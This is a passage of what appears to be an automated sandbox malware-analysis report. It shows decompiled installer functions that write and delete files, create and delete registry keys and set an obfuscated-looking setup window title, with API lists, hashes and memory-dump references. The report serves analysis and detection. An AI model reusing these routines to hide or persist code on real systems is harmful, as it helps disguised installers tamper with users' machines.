				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0x7e00
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                      0x0040266e
                      0x00402670
                      0x0040267c
                      0x0040267f
                      0x00402689
                      0x0040268d
                      0x0040268d
                      0x00402693
                      0x004026a0
                      0x004026a8
                      0x004026ab
                      0x004026b1
                      0x004026bf
                      0x004026c4
                      0x004026c8
                      0x004026cb
                      0x004026d4
                      0x004026e0
                      0x004026e4
                      0x004026e7
                      0x004026f1
                      0x00402710
                      0x004026f8
                      0x004026fd
                      0x00402705
                      0x00402708
                      0x0040270d
                      0x0040270d
                      0x00402717
                      0x00402717
                      0x00402729
                      0x00402730
                      0x00402742
                      0x00402742
                      0x00402748
                      0x00402748
                      0x00402753
                      0x00402754
                      0x00402758
                      0x0040275c
                      0x00402762
                      0x00402762
                      0x00402769
                      0x00402156
                      0x00402880
                      0x0040288c

                      APIs
                      • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                      • GlobalFree.KERNEL32 ref: 00402717
                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                      • GlobalFree.KERNEL32 ref: 00402730
                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                      • String ID:
                      • API String ID: 3294113728-0
                      • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                      • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                      0x00404e29
                      0x00404e35
                      0x00404e38
                      0x00404e3e
                      0x00404e4a
                      0x00404e4d
                      0x00404e50
                      0x00404e56
                      0x00404e56
                      0x00404e5c
                      0x00404e64
                      0x00404e67
                      0x00404e84
                      0x00404e88
                      0x00404e91
                      0x00404e91
                      0x00404e9b
                      0x00404ea4
                      0x00404eb0
                      0x00404eb7
                      0x00404ebb
                      0x00404ebe
                      0x00404ed1
                      0x00404edf
                      0x00404edf
                      0x00404ee3
                      0x00404ee5
                      0x00404ee8
                      0x00000000
                      0x00404ee8
                      0x00404e69
                      0x00404e71
                      0x00404e79
                      0x00404e7f
                      0x00000000
                      0x00404e7f
                      0x00404e79
                      0x00404e67
                      0x00404ef2

                      APIs
                      • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                      • String ID:
                      • API String ID: 2531174081-0
                      • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                      • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                      0x00404700
                      0x0040470d
                      0x00404713
                      0x00404751
                      0x00404751
                      0x00404760
                      0x00404767
                      0x00000000
                      0x00404769
                      0x00404715
                      0x00404724
                      0x0040472c
                      0x0040472f
                      0x00404741
                      0x00404747
                      0x0040474e
                      0x00000000
                      0x0040474e
                      0x00000000

                      APIs
                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                      • GetMessagePos.USER32 ref: 00404715
                      • ScreenToClient.USER32 ref: 0040472F
                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Message$Send$ClientScreen
                      • String ID: f
                      • API String ID: 41195575-1993550816
                      • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                      • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                      • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}











                      0x004022f6
                      0x004022fb
                      0x00402305
                      0x0040230f
                      0x00402312
                      0x0040231c
                      0x00402322
                      0x0040232c
                      0x00402333
                      0x0040233b
                      0x00402349
                      0x0040234d
                      0x00402358
                      0x00402358
                      0x0040235c
                      0x00402360
                      0x00402366
                      0x0040236b
                      0x0040236b
                      0x0040236f
                      0x0040237b
                      0x0040237b
                      0x00402394
                      0x00402396
                      0x00402396
                      0x00402399
                      0x0040246f
                      0x0040246f
                      0x00402880
                      0x0040288c

                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CloseCreateValuelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp
                      • API String ID: 1356686001-866893742
                      • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                      • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                      • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403897, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x4de368
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "jefgbrzfgglybaslbprz Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x2
						_t27 =  *0x423ec8; // 0x4de514
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x4de52c
								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                      0x0040389b
                      0x004038a0
                      0x004038a6
                      0x004038ab
                      0x004038ab
                      0x004038b3
                      0x00000000
                      0x00000000
                      0x004038b5
                      0x004038bb
                      0x004038c3
                      0x004038c5
                      0x004038cb
                      0x004038cb
                      0x004038cd
                      0x004038d9
                      0x00000000
                      0x00000000
                      0x004038dd
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004038df
                      0x004038e4
                      0x004038ed
                      0x004038f3
                      0x004038f8
                      0x0040390c
                      0x00403917
                      0x0040392f
                      0x00403935
                      0x0040393a
                      0x00403942
                      0x00403963
                      0x00403963
                      0x00403963
                      0x00403944
                      0x00403946
                      0x00403946
                      0x0040394a
                      0x0040394d
                      0x00403951
                      0x00403951
                      0x00403956
                      0x0040395c
                      0x0040395c
                      0x00000000
                      0x00403946
                      0x004038fa
                      0x004038ff
                      0x00403908
                      0x00403901
                      0x00403901
                      0x00403901
                      0x004038ff

                      APIs
                      • SetWindowTextA.USER32(00000000,jefgbrzfgglybaslbprz Setup), ref: 0040392F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: TextWindow
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\$hM$jefgbrzfgglybaslbprz Setup
                      • API String ID: 530164218-2157112962
                      • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                      • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                      • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                      • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}







                      0x00402bd1
                      0x00402bd3
                      0x00402bda
                      0x00402bdd
                      0x00402bdd
                      0x00402be3
                      0x00000000
                      0x00402be3
                      0x00402beb
                      0x00402bf1
                      0x00000000
                      0x00402bf4
                      0x00402bfb
                      0x00402c01
                      0x00402c07
                      0x00402c09
                      0x00402c0f
                      0x00402c4d
                      0x00402c53
                      0x00000000
                      0x00402c53
                      0x00402c11
                      0x00402c18
                      0x00402c29
                      0x00000000
                      0x00402c37
                      0x00402c18
                      0x00402c5a

                      APIs
                      • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                      • GetTickCount.KERNEL32 ref: 00402BFB
                      • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                        • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,00000C1B), ref: 00402BBE
                      • wsprintfA.USER32 ref: 00402C29
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                      • String ID: ... %d%%
                      • API String ID: 632923820-2449383134
                      • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                      • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 84%
                      			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}










                      0x00402a38
                      0x00402a49
                      0x00402a51
                      0x00402a79
                      0x00402a60
                      0x00402a63
                      0x00402ab3
                      0x00402ab9
                      0x00402abb
                      0x00000000
                      0x00402abb
                      0x00402a70
                      0x00402a75
                      0x00402a77
                      0x00000000
                      0x00000000
                      0x00402a77
                      0x00402a8e
                      0x00402a96
                      0x00402a9d
                      0x00402ac3
                      0x00402ac9
                      0x00000000
                      0x00000000
                      0x00402ad1
                      0x00402ad7
                      0x00402ad9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402ad9
                      0x00000000
                      0x00402aac
                      0x00402ac0

                      APIs
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                      • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                      • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Close$DeleteEnumOpen
                      • String ID:
                      • API String ID: 1912718029-0
                      • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                      • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                      0x00401ccb
                      0x00401cd2
                      0x00401d01
                      0x00401d09
                      0x00401d10
                      0x00401d10
                      0x00402880
                      0x0040288c

                      APIs
                      • GetDlgItem.USER32 ref: 00401CC5
                      • GetClientRect.USER32 ref: 00401CD2
                      • LoadImageA.USER32 ref: 00401CF3
                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                      • DeleteObject.GDI32(00000000), ref: 00401D10
                      Memory Dump Source
